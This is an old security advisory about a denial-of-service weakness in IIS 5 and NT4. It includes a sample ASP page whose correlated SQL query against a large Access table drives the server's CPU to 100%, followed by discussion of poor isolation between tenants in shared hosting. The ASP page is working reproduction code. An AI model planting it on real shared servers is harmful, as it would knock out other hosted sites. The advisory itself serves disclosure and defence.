COMMAND

    IIS

SYSTEMS AFFECTED

    IIS

PROBLEM

    Jair Pedro found  following.  An  especific SQL instruction  works
    fine under MS-Office, but in a  ASP page, it causes the CPU  usage
    to grow up until it reaches  100%, and the only alternative is  to
    turn off the machine.

    These  has  been  tested  in  4  diferent  machines  (K6-2/400 MHZ
    128MB/PII-500 Mhz 256MB) running systems as folows:

        - 2 machines were running Win2K Pro/IIS5 SP1-Portuguese version
        - 1 machine was running Win2k Server/IIS5 SP1 -Portuguese Version
        - 1 machine was running WinNt4 Server/SP5 - Portuguese Version

    Below is a sample asp page to reproduce to problem:

    <%
    'TestBufferOverFlow.Asp

    'DbExample is a Database with only one table named "Tabela2"
    '"Tabela2" is a table with about 120.000 registers
    'SqlSearch is an sql string which works fine if it is run on MsAcess 2000;
    'It Also Works fine if I clean up  the table, lefting few registers
    'but in an ASP page, it causes to CPU usage to hit (and stay at) 100%
    'Please advise if u want me to send the complete structure of Table2

    Dim Conn, rs, sqlSearch,strConex
    Set Conn=CreateObject("Adodb.Connection")
    Set rs=Createobject("AdoDb.Recordset")
    strConex="DBQ=c:\inetpub\Database\DbExample.mdb;Driver={Microsoft Access
    Driver (*.mdb)}"
    Conn.Open strConex,"",""
    sqlSearch="SELECT * FROM Tabela2 "
    sqlSearch=sqlSearch & "WHERE (((Tabela2.unidade) In (SELECT [unidade] FROM
    [Tabela2] As Tmp GROUP BY [unidade],[endereco] HAVING Count(*)>1  And
    [endereco] = [Tabela2].[endereco]))) "
    sqlSearch=sqlSearch & "ORDER BY Tabela2.unidade, Tabela2.endereco;"
    Response.write "Next Instruction will crashs IIS"
    rs.Open sqlSearch, conn
    Response.Write "This line will never be reached"
    rs.Close
    Conn.Close
    set rs=nothing
    set conn=nothing
    %>

SOLUTION

    In order for this ASP code to execute, it must reside on the local
    webserver in question.  If  the malicious user had the  ability to
    upload  code  to  the  webserver,  "unpleasant things can happen".
    Allowing  untrusted  users  to  upload  code  to  a  webserver  is
    discussed in Rule #4 from the Ten Immutable Laws of Security:

        http://www.microsoft.com/technet/security/10imlaws.asp#d

    HOWEVER, what  are web  hosting companies  suppose to  do about  a
    person who pays  20 bucks to  get an account,  uploads a file  and
    takes  down  the  X  number  of  other  people hosted on that same
    server?   Or  maybe  someone  does  not  go and buy and account...
    instead  one  domain  on  a  server  with  X  number of domains is
    incorrectly setup to allow file  uploads via a poorly written  ASP
    script that  allows people  to upload  to that  insecure domain...
    now, because we have no  local security, all of those  domains are
    screwed.  We all  know that in a  Unix environment (if things  are
    setup correctly)  someone getting  access to  one domain  does not
    have to mean the end of the  world for the rest of the domains  in
    a multi-homed environment.

    An IIS server should not so  easily fall over if someone gets  the
    ability  to  execute  as  IUSR_MACHINE....  Look at Apache... just
    because someone breaks  in via Apache  (running as "nobody")  that
    does not have  to lead to  the entire system  being compromised or
    taken off line.